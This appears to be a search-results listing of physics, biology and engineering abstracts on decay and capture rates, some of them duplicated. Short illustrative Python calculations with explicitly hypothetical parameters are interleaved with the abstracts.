No sampling bias was, however, detectable using the stage-based matrix model. Cellulose and lignin time trends could be derived on the basis of the ages of the CWD. The half-lives for cellulose were 21 years for spruce and 50 years for larch. The half-life of lignin is considerably higher and may be more than 100 years in larch CWD. 10. β-DECAY of Key Titanium Isotopes in Stellar Environment Amongst iron regime nuclei, β-decay rates on titanium isotopes are considered to be important during the late phases of evolution of massive stars. The key β-decay isotopes during presupernova evolution were searched from the available literature, and a microscopic calculation of the decay rates was performed using the proton-neutron quasiparticle random phase approximation (pn-QRPA) theory. As per earlier simulation results, electron capture and β-decay on certain isotopes of titanium are considered to be important for the presupernova evolution of massive stars. Earlier the stellar electron capture rates and neutrino energy loss rates due to relevant titanium isotopes were presented. In this paper we finally present the β-decay rates of key titanium isotopes in the stellar environment. The results are also compared against previous calculations. The pn-QRPA β-decay rates are bigger at high stellar temperatures and smaller at high stellar densities compared to the large scale shell model results. This study can prove useful for core-collapse simulators. 11. The in vivo efficacy of neuraminidase inhibitors cannot be determined from the decay rates of influenza viral titers observed in treated patients Palmer, John; Dobrovolny, Hana M.; Beauchemin, Catherine A. A. 2017-01-01 Antiviral therapy is a first line of defence against new influenza strains. Current pandemic preparations involve stockpiling oseltamivir, an oral neuraminidase inhibitor (NAI), so rapidly determining the effectiveness of NAIs against new viral strains is vital for deciding how to use the stockpile. Previous studies have shown that it is possible to extract the drug efficacy of antivirals from the viral decay rate of chronic infections. In the present work, we use a nonlinear mathematical model representing the course of an influenza infection to explore the possibility of extracting NAI drug efficacy using only the observed viral titer decay rates seen in patients. We first show that the effect of a time-varying antiviral concentration can be accurately approximated by a constant efficacy. We derive a relationship relating the true treatment dose and time elapsed between doses to the constant drug dose required to approximate the time-varying dose. Unfortunately, even with the simplification of a constant drug efficacy, we show that the viral decay rate depends not just on drug efficacy, but also on several viral infection parameters, such as infection and production rate, so that it is not possible to extract drug efficacy from viral decay rate alone. 12. The in vivo efficacy of neuraminidase inhibitors cannot be determined from the decay rates of influenza viral titers observed in treated patients PubMed Central Palmer, John; Dobrovolny, Hana M.; Beauchemin, Catherine A. A. 2017-01-01 Antiviral therapy is a first line of defence against new influenza strains. Current pandemic preparations involve stockpiling oseltamivir, an oral neuraminidase inhibitor (NAI), so rapidly determining the effectiveness of NAIs against new viral strains is vital for deciding how to use the stockpile.
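As a rough numerical illustration of the constant-efficacy approximation described in the abstract above (not the authors' derivation; the Emax-type pharmacodynamic model and all parameter values are assumed here for illustration):

```python
import numpy as np

# Replace a time-varying drug efficacy by its time average over one dosing interval.
# PK/PD model and parameters are hypothetical, for illustration only.

IC50 = 30.0          # hypothetical concentration giving 50% efficacy (arbitrary units)
C_peak = 200.0       # hypothetical peak concentration just after a dose
k_elim = 0.12        # hypothetical elimination rate (1/h)
tau = 12.0           # hours between doses

t = np.linspace(0.0, tau, 1000)
conc = C_peak * np.exp(-k_elim * t)      # concentration decays between doses
eff = conc / (conc + IC50)               # Emax-type efficacy, between 0 and 1

eps_const = np.trapz(eff, t) / tau       # time-averaged (constant) efficacy
print(f"time-averaged efficacy over one dosing interval ~ {eps_const:.2f}")
```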
Previous studies have shown that it is possible to extract the drug efficacy of antivirals from the viral decay rate of chronic infections. In the present work, we use a nonlinear mathematical model representing the course of an influenza infection to explore the possibility of extracting NAI drug efficacy using only the observed viral titer decay rates seen in patients. We first show that the effect of a time-varying antiviral concentration can be accurately approximated by a constant efficacy. We derive a relationship relating the true treatment dose and time elapsed between doses to the constant drug dose required to approximate the time-varying dose. Unfortunately, even with the simplification of a constant drug efficacy, we show that the viral decay rate depends not just on drug efficacy, but also on several viral infection parameters, such as infection and production rate, so that it is not possible to extract drug efficacy from viral decay rate alone. PMID:28067324 13. THE LONG-TERM DECAY IN PRODUCTION RATES FOLLOWING THE EXTREME OUTBURST OF COMET 17P/HOLMES SciTech Connect Schleicher, David G. 2009-10-15 Numerous sets of narrowband filter photometry were obtained of Comet 17P/Holmes from Lowell Observatory during the interval of 2007 November 1 to 2008 March 5. Observations began 8 days following its extreme outburst, at which time the derived water production rate, based on OH measurements, was 5 x 10{sup 29} molecule s{sup -1} and the derived proxy of dust production, A({theta})f{rho}, was about 5 x 10{sup 5} cm. Relative production rates for the other gas species, CN, C{sub 2}, C{sub 3}, and NH, are consistent with 'typical' composition (based on our update to the classifications by A'Hearn et al.). An exponential decay in the logarithm of measured production rates as a function of time was observed for all species, with each species dropping by factors of about 200-500 after 125 days. All gas species exhibited clear trends with aperture size, and these trends are consistent with larger apertures having a greater proportion of older material that was released when production rates were higher. Much larger aperture trends were measured for the dust, most likely because the dust grains have smaller outflow velocities and longer lifetimes than the gas species; therefore, a greater proportion of older, i.e., higher production dust is contained within a given aperture. By extrapolating to a sufficiently small aperture size, we derive near-instantaneous water and dust production rates throughout the interval of observation, and also estimate values immediately following the outburst. The finite lifetime of the gas species requires that much higher ice vaporization rates were taking place throughout the observation interval than occurred prior to the outburst, likely due to the continued release of icy grains from the nucleus. The relatively small aperture trends for the gas species also imply that the bulk of fresh, excess volatiles are confined to the nucleus and near-nucleus regime, rather than being associated with the outburst ejecta cloud. A minimum of about 0 14. Vibrational structure and partial rates of resonant Auger decay of the N 1s ->2pi core excitations in nitric oxide SciTech Connect Kukk, Edwin; Snell, Gyorgy; Bozek, John D.; Cheng, Wei-T.; Berrah, N. 2000-07-06 High-resolution resonant Auger electron spectra of NO measured in the vicinity of the N 1s {yields} 2{pi} core excitations are presented.
The open shell electronic configuration of the molecule results in four excited electronic states, three of which are populated in the photoabsorption spectrum, {sup 2}{Delta}, {sup 2}{Sigma}{sup -} and {sup 2}{Sigma}{sup +}. Electron emission spectra obtained at different vibrational levels of the three N 1s core-excited states of NO are reported. Recently reported ab initio calculations [J. Chem. Phys. 106, 4038(1997)] are used to generate theoretical spectra for comparison with the experimental results, taking lifetime vibration interference and Auger resonant Raman effects into account. Very good agreement is found for the lowest energy X {sup 1}{Sigma}{sup +} final ionic state. Spectra of the higher energy final ionic states are decomposed into contributions from the different 5{sigma}{sup -1}2{pi}{sup 1} and 1{pi}{sup -1}2{pi}{sup 1} configurations for comparison of the calculated and experimental partial Auger decay rates. A revised value for the adiabatic ionization energy of the {sup 1}{Delta} ionic state results from the deconvolution. 15. Global Well-Posedness and Decay Rates of Strong Solutions to a Non-Conservative Compressible Two-Fluid Model Evje, Steinar; Wang, Wenjun; Wen, Huanyao 2016-09-01 In this paper, we consider a compressible two-fluid model with constant viscosity coefficients and unequal pressure functions P^+ ≠ P^-. As mentioned in the seminal work by Bresch, Desjardins, et al. (Arch Rational Mech Anal 196:599-629, 2010) for the compressible two-fluid model, where P^+ = P^- (common pressure) is used and capillarity effects are accounted for in terms of a third-order derivative of density, the case of constant viscosity coefficients cannot be handled in their settings. Besides, their analysis relies on a special choice for the density-dependent viscosity [refer also to another reference (Commun Math Phys 309:737-755, 2012) by Bresch, Huang and Li for a study of the same model in one dimension but without capillarity effects]. In this work, we obtain the global solution and its optimal decay rate (in time) with constant viscosity coefficients and some smallness assumptions. In particular, capillary pressure is taken into account in the sense that ΔP = P^+ - P^- = f ≠ 0, where the difference function f is assumed to be a strictly decreasing function near the equilibrium relative to the fluid corresponding to P^-. This assumption plays a key role in the analysis and appears to have an essential stabilization effect on the model in question. 16. Probability of passing through a parabolic barrier and thermal decay rate: Case of linear coupling both in momentum and in coordinate SciTech Connect Kuzyakin, R. A.; Sargsyan, V. V.; Adamian, G. G.; Antonenko, N. V. 2011-09-15 With the quantum diffusion approach, the probability of passing through the parabolic barrier and the quasistationary thermal decay rate from a metastable state are examined in the limit of linear coupling both in momentum and in coordinate between a collective subsystem and the environment. An increase of the passing probability with the friction coefficient is demonstrated to occur at subbarrier energies. 17. Baseline capture rates and roosting habits of Myotis septentrionalis (Northern Long-Eared Bat) prior to white-nose syndrome detection in the southern Appalachians Treesearch Vanessa G. Rojas; Joy M. O'Keefe; Susan C. Loeb 2017-01-01 Myotis septentrionalis (Northern Long-eared Bat) is a federally threatened insectivorous bat facing devastating population declines due to white-nose syndrome (WNS).
Our study provides pre-WNS (2009) capture rates and roosting-behavior data for Northern Long-eared Bats in the southern Appalachians. We conducted mist-net surveys at 37 sites and... 18. HOLMES: The electron capture decay of 163Ho to measure the electron neutrino mass with sub-eV sensitivity. PubMed Alpert, B; Balata, M; Bennett, D; Biasotti, M; Boragno, C; Brofferio, C; Ceriale, V; Corsini, D; Day, P K; De Gerone, M; Dressler, R; Faverzani, M; Ferri, E; Fowler, J; Gatti, F; Giachero, A; Hays-Wehle, J; Heinitz, S; Hilton, G; Köster, U; Lusignoli, M; Maino, M; Mates, J; Nisi, S; Nizzolo, R; Nucciotti, A; Pessina, G; Pizzigoni, G; Puiu, A; Ragazzi, S; Reintsema, C; Gomes, M Ribeiro; Schmidt, D; Schumann, D; Sisti, M; Swetz, D; Terranova, F; Ullom, J The European Research Council has recently funded HOLMES, a new experiment to directly measure the neutrino mass. HOLMES will perform a calorimetric measurement of the energy released in the decay of 163Ho. The calorimetric measurement eliminates systematic uncertainties arising from the use of external beta sources, as in experiments with beta spectrometers. This measurement was proposed in 1982 by A. De Rujula and M. Lusignoli, but only recently has progress in detector technology allowed a sensitive experiment to be designed. HOLMES will deploy a large array of low temperature microcalorimeters with implanted 163Ho nuclei. The resulting mass sensitivity will be as low as 0.4 eV. HOLMES will be an important step forward in the direct neutrino mass measurement with a calorimetric approach as an alternative to spectrometry. It will also establish the potential of this approach to extend the sensitivity down to 0.1 eV. We outline here the project with its technical challenges and perspectives. 19. The influence of hook type, angler experience, and fish size on injury rates and the duration of capture in an Alaskan catch-and-release rainbow trout fishery USGS Publications Warehouse Meka, Julie M. 2004-01-01 Owing to concerns about the high incidence of past hooking injuries in Alagnak River rainbow trout Oncorhynchus mykiss, fish were captured with spin- and fly-fishing gear with barbed and barbless circle and "J" hooks to determine gear types contributing to injury. Landing and hook removal times were measured for a portion of fish captured, and the anatomical hooking location, hooking scar locations, bleeding intensity, angler experience, and fish size were recorded for all captured fish. Approximately 62% of fish captured experienced at least one new hooking injury, and 29% of fish had at least one past hooking injury. Small fish sustained higher new injury and bleeding rates, but large fish had higher past injury rates. Injury rates were higher for barbed J hooks, barbed J hooks took longer to remove, and fish caught by spin-fishing were injured more frequently than fish caught by fly-fishing. Fewer fly-fishing-caught fish were injured using circle hooks, and circle hooks tended to hook fish in only one location, generally in the jaw. Barbed J hooks were more efficient at landing fish, and J hooks were more efficient at landing fish than circle hooks. Novice anglers injured proportionally more fish than experienced anglers, primarily during hook removal. Landing time was positively correlated with fish size, and experienced anglers took longer to land fish than novices because they captured larger fish.
These results suggest that a reduction in hooking injuries may be achieved by using circle hooks as an alternative to J hooks and barbless J hooks to reduce injury and handling time, yet catch efficiency for both methods would be reduced. Although fish captured with barbless J hooks and circle hooks had fewer injuries, it is important to note that each hook type also caused significant injury, and angler education is recommended to promote proper hook removal techniques. 20. Gamow-Teller transitions from Mg24 and their impact on the electron capture rates in the O+Ne+Mg cores of stars Nabi, Jameel-Un; Rahman, Muneeb-Ur 2007-03-01 Electron captures on nuclei play an important role in the collapse of the stellar core in the stages leading to a type-II supernova. Recent observations of subluminous Type II-P supernovae (e.g., 2005cs, 2003gd, 1999br) were able to rekindle interest in 8-10 M⊙ stars, which develop O+Ne+Mg cores. We used the proton-neutron quasiparticle random phase approximation (pn-QRPA) theory to calculate the B(GT) strength for Mg24 → Na24 and its associated electron capture rates for incorporation in simulation calculations. The calculated rates, in this article, have differences with the earlier reported shell model and Fuller, Fowler, and Newman (hereafter FN2) rates. We compared Gamow-Teller (GT) strength distribution functions and found fairly good agreement with experiment and the shell model. However, the GT centroid and the total GT strength, which are useful in the calculation of electron capture rates in the core of massive presupernova stars, lead to the enhancement of our rate up to a factor of 4 compared to the shell model rates at high temperatures and densities. 1. Suspended particle capture by synthetic vegetation in a laboratory flume Fauria, Kristen E.; Kerwin, Rachel E.; Nover, Daniel; Schladow, S. Geoffrey 2015-11-01 Vegetated floodplains and wetlands trap particles, a process that is important for water quality and wetland function and morphology. The rates of particle removal by vegetation remain poorly characterized, especially for small particles and vegetation coated with biofilm. In this study, we measured capture rates of road dust by arrays of grass-like synthetic vegetation in a laboratory flume. We performed 40 experiments in which stem density, flow velocity, the presence of biofilm, and initial particle concentration varied, and used an in situ particle size analyzer to measure the concentration of a continuous particle size distribution (1.25-250 µm diameter). We fit first-order decay models to the particle concentration measurements to determine particle capture rates and found that capture rates increased with particle size, stem density, and the presence of biofilm. Capture rates decreased with increasing flow velocity, which suggests that fast flows may resuspend particles from stems. We also calculated percent particle capture efficiencies and fit a new empirical model for capture efficiency to our results. We found that particle capture efficiency was highest for low stem density treatments and propose that stem density affects capture by altering turbulent kinetic energy. 2. Changes in rates of capture and demographics of Myotis septentrionalis (Northern Long-eared Bat) in Western Virginia before and after onset of white-nose syndrome USGS Publications Warehouse Reynolds, Richard J.; Powers, Karen E.; Orndorff, Wil; Ford, W. Mark; Hobson, Christopher S.
2016-01-01 Documenting the impacts of white-nose syndrome (WNS) on demographic patterns, such as annual survivorship and recruitment, is important to understanding the extirpation or possible stabilization and recovery of species over time. To document demographic impacts of WNS on Myotis septentrionalis (Northern Long-eared Bat), we mistnetted at sites in western Virginia where Northern Long-eared Bats were captured in summer before (1990–2009) and after (2011–2013) the onset of WNS. Our mean capture rates per hour, adjusted for area of net and sampling duration, declined significantly from 0.102 bats/ m2/h before WNS to 0.005 bats/m2/h (-95.1%) by 2013. We noted a time lag in the rate of decline between published data based on bats captured during the swarming season and our summer mist-netting captures from the same geographic area. Although proportions of pregnant or lactating females did not vary statistically in samples obtained before and after the onset of WNS, the proportion of juvenile bats declined significantly (-76.7%), indicating that the viability of Northern Long-eared Bats in western Virginia is tenuous. 3. Large beta-delayed one-neutron and two-neutron emission rates in the decay of 86Ga SciTech Connect Batchelder, J. C.; Gross, Carl J.; Grzywacz, Robert Kazimierz; Miernik, Krzysztof A.; Anthony J. Mendez, II; Mazzocchi, C.; Madurga, M.; Liu, Yuan; Paulauskas, Stanley V.; Miller, D.; Rykaczewski, Krzysztof Piotr; Winger, J. A.; Wolinska-Cichocka, M; Brewer, N. T.; Borzov, Ivan N.; Jost, Carola U. 2013-09-24 Beta decay of Ga86 was studied by means of β-neutron-γ spectroscopy. An isotopically pure 86Ga beam was produced at the Holifield Radioactive Ion Beam Facility using a resonance ionization laser ion source and high-resolution electromagnetic separation. The decay of 86Ga revealed a half-life of 43+21-15 ms and large β-delayed one-neutron and two-neutron branching ratios of P1n=60(10)% and P2n=20(10)%. The βγ decay of 86Ga populated a 527 keV transition that is interpreted as the deexcitation of the first 2+ state in the N=54 isotone Ge86 and suggests a quick onset of deformation in Ge isotopes beyond N=50. 4. High-Resolution Neutron Capture and Total Cross-Section Measurements, and the Astrophysical 95Mo(n,gamma) Reaction Rate at s-process Temperatures SciTech Connect Koehler, Paul Edward; Guber, Klaus H; Harvey, John A; Wiarda, Dorothea 2008-01-01 Abundances of Mo isotopes predicted by stellar models of the s process are, except for {sup 95}Mo, in good agreement with data from single grains of mainstream presolar SiC. Because the meteorite data seemed sound and no reasonable modification to stellar theory resulted in good agreement for {sup 95}Mo, it has been suggested that the recommended neutron capture reaction rate for this nuclide is 30% too low. Therefore, we have made a new determination of the {sup 95}Mo(n,{gamma}) reaction rate via high-resolution measurements of the neutron-capture and total cross sections of {sup 95}Mo at the Oak Ridge Electron Linear Accelerator. These data were analyzed with the R-matrix code SAMMY to obtain parameters for resonances up to E{sub n} = 10 keV. Also, a small change to our capture apparatus allowed us to employ a new technique to vastly improve resonance spin and parity assignments. These new resonance parameters, together with our data in the unresolved range, were used to calculate the {sup 95}Mo(n,{gamma}) reaction rate at s-process temperatures. 
We compare the currently recommended rate to our new results and discuss their astrophysical impact. 5. Combined atomic–nuclear decay SciTech Connect Dzyublik, A. Ya. 2016-05-15 We analyzed in detail the combined decay of the atomic-nuclear state, which consists of the excited 3/2{sup +} level of {sub 63}{sup 153}Eu and a K hole, formed in the K capture by {sup 153}Gd. This decay proceeds in two stages. First, the nucleus transfers its energy to a 2p electron, which flies into the continuum spectrum, and then returns into the 1s hole, emitting a γ quantum with an energy equal to the sum of the energies of the nuclear and atomic transitions. We estimated the decay probability to be 2.2 × 10{sup −13}, which is much less than the recent experimental findings. 6. Analysis of D0 -> K+ pi- pi0 Decays: Search for D0-D0bar Mixing, and Measurements of the Doubly Cabibbo-Suppressed Decay Rate and Resonance Contributions SciTech Connect Wilson, Michael Galante 2005-12-13 Analyzing D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0} decays, herein are presented the methods and results of a search for D{sup 0}-{bar D}{sup 0} mixing, a measurement of the branching ratio R {equivalent_to} {Lambda}(D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0})/{Lambda}(D{sup 0} {yields} K{sup -}{pi}{sup +}{pi}{sup 0}), and measurements of the contributions from D{sup 0} {yields} K{sup +}{rho}{sup -}, K*{sup +}{pi}{sup -}, K*{sup 0}{pi}{sup 0}; 230.4 fb{sup -1} of data collected from the BABAR detector at the PEP-II collider during 2000-2004 (Runs 1-4) are analyzed. An event-level tagging technique is developed, which facilitates the accurate determination of doubly Cabibbo-suppressed resonance contributions by suppressing background from Cabibbo-favored decays. The branching ratio is measured as R = (0.214 {+-} 0.008 (stat) {+-} 0.008 (syst))%, with (46.1 {+-} 3.3 (stat) {+-} 2.9 (syst))% of D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0} decays proceeding through the channel D{sup 0} {yields} K*{sup +}{pi}{sup -}. The data are consistent with the null-D-mixing hypothesis at a confidence level of 10%, and the expected value of {+-} {radical}(x{sup 2} + y{sup 2}) is measured as -0.013 {+-} 0.010 (stat), indicating negative interference between mixing and doubly Cabibbo-suppressed decay. The expected value of the integrated mixing rate is (x{sup 2} + y{sup 2})/2 = (0.013 {+-} 0.013 (stat))%. 7. Measurements of radiative-decay rates of the 2s22p(2P°)-2s2p2(4P) intersystem transitions of C+ Fang, Z.; Kwong, Victor H. S.; Wang, Jiebing; Parkinson, W. H. 1993-08-01 The radiative-decay rates of the 2s22p(2P0)-2s2p2(4P) intersystem transitions of C+ ions have been measured by recording the time dependence of the ~233-nm emission. A cylindrical radio-frequency ion trap was used to store electron-impact-produced C+ ions. The time-dependent signals were analyzed by multiexponential least-squares fits to the data. The measured radiative-decay rates to the ground term are 146.4(+8.3,-9.2) s-1 for 4P1/2, 11.6(+0.8,-1.7) s-1 for 4P3/2, and 51.2(+2.6,-3.5) s-1 for 4P5/2. Comparison of the measured values with theoretical values is presented. 8. Estimation of decay rates for fecal indicator bacteria and bacterial pathogens in agricultural field-applied manure EPA Science Inventory Field-applied manure is an important source of pathogenic exposure in surface water bodies for humans and ecological receptors.
We analyzed the persistence and decay of fecal indicator bacteria and bacterial pathogens from three sources (cattle, poultry, swine) for agricultural f... 9. Estimation of decay rates for fecal indicator bacteria and bacterial pathogens in agricultural field-applied manure EPA Science Inventory Field-applied manure is an important source of pathogenic exposure in surface water bodies for humans and ecological receptors. We analyzed the persistence and decay of fecal indicator bacteria and bacterial pathogens from three sources (cattle, poultry, swine) for agricultural f... 10. Reshaping the epigenetic landscape during early flower development: induction of attractor transitions by relative differences in gene decay rates. PubMed Davila-Velderrain, Jose; Villarreal, Carlos; Alvarez-Buylla, Elena R 2015-05-13 Gene regulatory network (GRN) dynamical models are standard systems biology tools for the mechanistic understanding of developmental processes and are enabling the formalization of the epigenetic landscape (EL) model. In this work we propose a modeling framework which integrates standard mathematical analyses to extend the simple GRN Boolean model in order to address questions regarding the impact of gene specific perturbations in cell-fate decisions during development. We systematically tested the propensity of individual genes to produce qualitative changes to the EL induced by modification of gene characteristic decay rates reflecting the temporal dynamics of differentiation stimuli. By applying this approach to the flower specification GRN (FOS-GRN) we uncovered differences in the functional (dynamical) role of their genes. The observed dynamical behavior correlates with biological observables. We found a relationship between the propensity of undergoing attractor transitions between attraction basins in the EL and the direction of differentiation during early flower development - being less likely to induce up-stream attractor transitions as the course of development progresses. Our model also uncovered a potential mechanism at play during the transition from EL basins defining inflorescence meristem to those associated to flower organs meristem. Additionally, our analysis provided a mechanistic interpretation of the homeotic property of the ABC genes, being more likely to produce both an induced inter-attractor transition and to specify a novel attractor. Finally, we found that there is a close relationship between a gene's topological features and its propensity to produce attractor transitions. The study of how the state-space associated with a dynamical model of a GRN can be restructured by modulation of genes' characteristic expression times is an important aid for understanding underlying mechanisms occurring during development. Our contribution offers a 11. A unified approach via convexity for optimal energy decay rates of finite and infinite dimensional vibrating damped systems with applications to semi-discretized vibrating damped systems Alabau-Boussouira, Fatiha The Liapunov method is celebrated for its strength to establish strong decay of solutions of damped equations. Extensions to infinite dimensional settings have been studied by several authors (see e.g. Haraux, 1991 [11], and Komornik and Zuazua, 1990 [17] and references therein). Results on optimal energy decay rates under general conditions of the feedback is far from being complete. The purpose of this paper is to show that general dissipative vibrating systems have structural properties due to dissipation. 
We present a general approach based on convexity arguments to establish sharp optimal or quasi-optimal upper energy decay rates for these systems, and on comparison principles based on the dissipation property, and interpolation inequalities (in the infinite dimensional case) for lower bounds of the energy. We stress the fact that this method works for finite as well as infinite dimensional vibrating systems and as well as for applications to semi-discretized nonlinear damped vibrating PDE's. A part of this approach has been introduced in Alabau-Boussouira (2004, 2005) [1,2]. In the present paper, we identify a new, simple and explicit criteria to select a class of nonlinear feedbacks, for which we prove a simplified explicit energy decay formula comparatively to the more general but also more complex formula we give in Alabau-Boussouira (2004, 2005) [1,2]. Moreover, we prove optimality of the decay rates for this class, in the finite dimensional case. This class includes a wide range of feedbacks, ranging from very weak nonlinear dissipation (exponentially decaying in a neighborhood of zero), to polynomial, or polynomial-logarithmic decaying feedbacks at the origin. In the infinite dimensional case, we establish a comparison principle on the energy of sufficiently smooth solutions through the dissipation relation. This principle relies on suitable interpolation inequalities. It allows us to give lower bounds for the energy of smooth initial data for the one 12. Transition in the decay rates of stationary distributions of Lévy motion in an energy landscape. PubMed Kaleta, Kamil; Lőrinczi, József 2016-02-01 The time evolution of random variables with Lévy statistics has the ability to develop jumps, displaying very different behaviors from continuously fluctuating cases. Such patterns appear in an ever broadening range of examples including random lasers, non-Gaussian kinetics, or foraging strategies. The penalizing or reinforcing effect of the environment, however, has been little explored so far. We report a new phenomenon which manifests as a qualitative transition in the spatial decay behavior of the stationary measure of a jump process under an external potential, occurring on a combined change in the characteristics of the process and the lowest eigenvalue resulting from the effect of the potential. This also provides insight into the fundamental question of what is the mechanism of the spatial decay of a ground state. 13. Transition in the decay rates of stationary distributions of Lévy motion in an energy landscape Kaleta, Kamil; Lőrinczi, József 2016-02-01 The time evolution of random variables with Lévy statistics has the ability to develop jumps, displaying very different behaviors from continuously fluctuating cases. Such patterns appear in an ever broadening range of examples including random lasers, non-Gaussian kinetics, or foraging strategies. The penalizing or reinforcing effect of the environment, however, has been little explored so far. We report a new phenomenon which manifests as a qualitative transition in the spatial decay behavior of the stationary measure of a jump process under an external potential, occurring on a combined change in the characteristics of the process and the lowest eigenvalue resulting from the effect of the potential. This also provides insight into the fundamental question of what is the mechanism of the spatial decay of a ground state. 14. Measurement of the solar neutrino capture rate with gallium metal. III. 
Results for the 2002-2007 data-taking period Abdurashitov, J. N.; Gavrin, V. N.; Gorbachev, V. V.; Gurkina, P. P.; Ibragimova, T. V.; Kalikhov, A. V.; Khairnasov, N. G.; Knodel, T. V.; Mirmov, I. N.; Shikhin, A. A.; Veretenkin, E. P.; Yants, V. E.; Zatsepin, G. T.; Bowles, T. J.; Elliott, S. R.; Teasdale, W. A.; Nico, J. S.; Cleveland, B. T.; Wilkerson, J. F. 2009-07-01 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy more than 233 keV of 65.4 +3.1/-3.0 (stat) +2.6/-2.8 (syst) SNU. The weighted average of the results of all three Ga solar neutrino experiments, SAGE, Gallex, and GNO, is now 66.1±3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature. During the recent period of data collection a new test of SAGE was made with a reactor-produced Ar37 neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior Cr51 neutrino-source experiments with Ga, is 0.87±0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in Ge71 has been overestimated. If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63 SNU to 66 SNU with an uncertainty of about 4%, in good agreement with experiment. We derive the current value of the neutrino flux produced in the Sun by the proton-proton fusion reaction to be ϕpp⊙ = (6.0±0.8)×10^10/(cm^2 s), which agrees well with the pp flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 15. Measurement of the solar neutrino capture rate with gallium metal. III. Results for the 2002-2007 data-taking period SciTech Connect Abdurashitov, J. N.; Gavrin, V. N.; Gorbachev, V. V.; Gurkina, P. P.; Ibragimova, T. V.; Kalikhov, A. V.; Khairnasov, N. G.; Knodel, T. V.; Mirmov, I. N.; Shikhin, A. A.; Veretenkin, E. P.; Yants, V. E.; Zatsepin, G. T.; Bowles, T. J.; Elliott, S. R.; Teasdale, W. A.; Nico, J. S.; Cleveland, B. T.; Wilkerson, J. F. 2009-07-15 The Russian-American experiment SAGE began to measure the solar neutrino capture rate with a target of gallium metal in December 1989. Measurements have continued with only a few brief interruptions since that time. In this article we present the experimental improvements in SAGE since its last published data summary in December 2001. Assuming the solar neutrino production rate was constant during the period of data collection, combined analysis of 168 extractions through December 2007 gives a capture rate of solar neutrinos with energy more than 233 keV of 65.4{sub -3.0}{sup +3.1} (stat) {sub -2.8}{sup +2.6} (syst) SNU. The weighted average of the results of all three Ga solar neutrino experiments, SAGE, Gallex, and GNO, is now 66.1{+-}3.1 SNU, where statistical and systematic uncertainties have been combined in quadrature.
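The quoted combination follows the standard inverse-variance recipe with statistical and systematic uncertainties added in quadrature; a short sketch with placeholder per-experiment numbers (the individual SAGE, Gallex, and GNO inputs are not listed in this abstract):

```python
import math

# Inverse-variance weighted average with stat and syst errors combined in quadrature.
# The per-experiment values below are placeholders, not the actual Ga-experiment results.

measurements = [
    # (rate in SNU, statistical error, systematic error) -- hypothetical
    (65.4, 3.0, 2.7),
    (69.3, 4.1, 3.6),
    (62.9, 5.3, 2.5),
]

weights, weighted_sum = [], 0.0
for value, stat, syst in measurements:
    sigma = math.hypot(stat, syst)       # combine stat and syst in quadrature
    w = 1.0 / sigma**2                   # inverse-variance weight
    weights.append(w)
    weighted_sum += w * value

mean = weighted_sum / sum(weights)
sigma_mean = math.sqrt(1.0 / sum(weights))
print(f"weighted average = {mean:.1f} +/- {sigma_mean:.1f} SNU")
```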
During the recent period of data collection a new test of SAGE was made with a reactor-produced {sup 37}Ar neutrino source. The ratio of observed to calculated rates in this experiment, combined with the measured rates in the three prior {sup 51}Cr neutrino-source experiments with Ga, is 0.87{+-}0.05. A probable explanation for this low result is that the cross section for neutrino capture by the two lowest-lying excited states in {sup 71}Ge has been overestimated. If we assume these cross sections are zero, then the standard solar model including neutrino oscillations predicts a total capture rate in Ga in the range of 63 SNU to 66 SNU with an uncertainty of about 4%, in good agreement with experiment. We derive the current value of the neutrino flux produced in the Sun by the proton-proton fusion reaction to be {phi}{sub pp}{sup {center_dot}}=(6.0{+-}0.8)x10{sup 10}/(cm{sup 2} s), which agrees well with the pp flux predicted by the standard solar model. Finally, we make several tests and show that the data are consistent with the assumption that the solar neutrino production rate is constant in time. 16. Measurement of the radiative and nonradiative decay rates of single CdSe nanocrystals through a controlled modification of their spontaneous emission. PubMed Brokmann, X; Coolen, L; Dahan, M; Hermier, J P 2004-09-03 We present a simple method to measure the radiative and nonradiative recombination rates of individual fluorescent emitters at room temperature. By placing a single molecule successively close and far from a dielectric interface and simultaneously measuring its photoluminescence decay and its orientation, both the radiative and nonradiative recombination rates can be determined. For CdSe nanocrystals, our results demonstrate that the fluorescence quantum efficiency, determined at the single-molecule level, is 98% in average, far above the value expected from conventional ensemble experiments. The bidimensional nature of the transition dipole is also directly evidenced from a single-particle measurement. 17. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-01 An improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. This method, a variation of deep level transient spectroscopy (DLTS) used with bipolar transistors, is applied to hot carrier trapping at vacancy-oxygen, carbon-oxygen, and three charge states of divacancy centers (V2) in n- and p-type silicon. Unlike standard DLTS, we fill traps by injecting carriers into the depletion region of a bipolar transistor diode using a pulse of forward bias current applied to the adjacent diode. We show that this technique is capable of accurately measuring a wide range of capture cross sections at varying electric fields due to the control of the carrier density it provides. Because this technique can be applied to a variety of carrier energy distributions, it should be valuable in modeling the effect of radiation-induced generation-recombination currents in bipolar devices. 18. Injection deep level transient spectroscopy: An improved method for measuring capture rates of hot carriers in semiconductors SciTech Connect Fleming, R. M.; Seager, C. H.; Lang, D. V.; Campbell, J. M. 2015-07-07 An improved method for measuring the cross sections for carrier trapping at defects in semiconductors is described. 
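The cross-section extraction in these DLTS measurements rests on the standard capture relation 1/τ_capture = σ·v_th·n; a hedged sketch of that arithmetic with hypothetical numbers (not values from the paper):

```python
import math

# Capture cross section from a measured capture time constant via
# 1/tau_capture = sigma * v_th * n. All numeric inputs are hypothetical.

k_B = 1.380649e-23        # Boltzmann constant, J/K
m0 = 9.109e-31            # electron rest mass, kg
m_eff = 0.26 * m0         # assumed effective electron mass in silicon
T = 300.0                 # temperature, K

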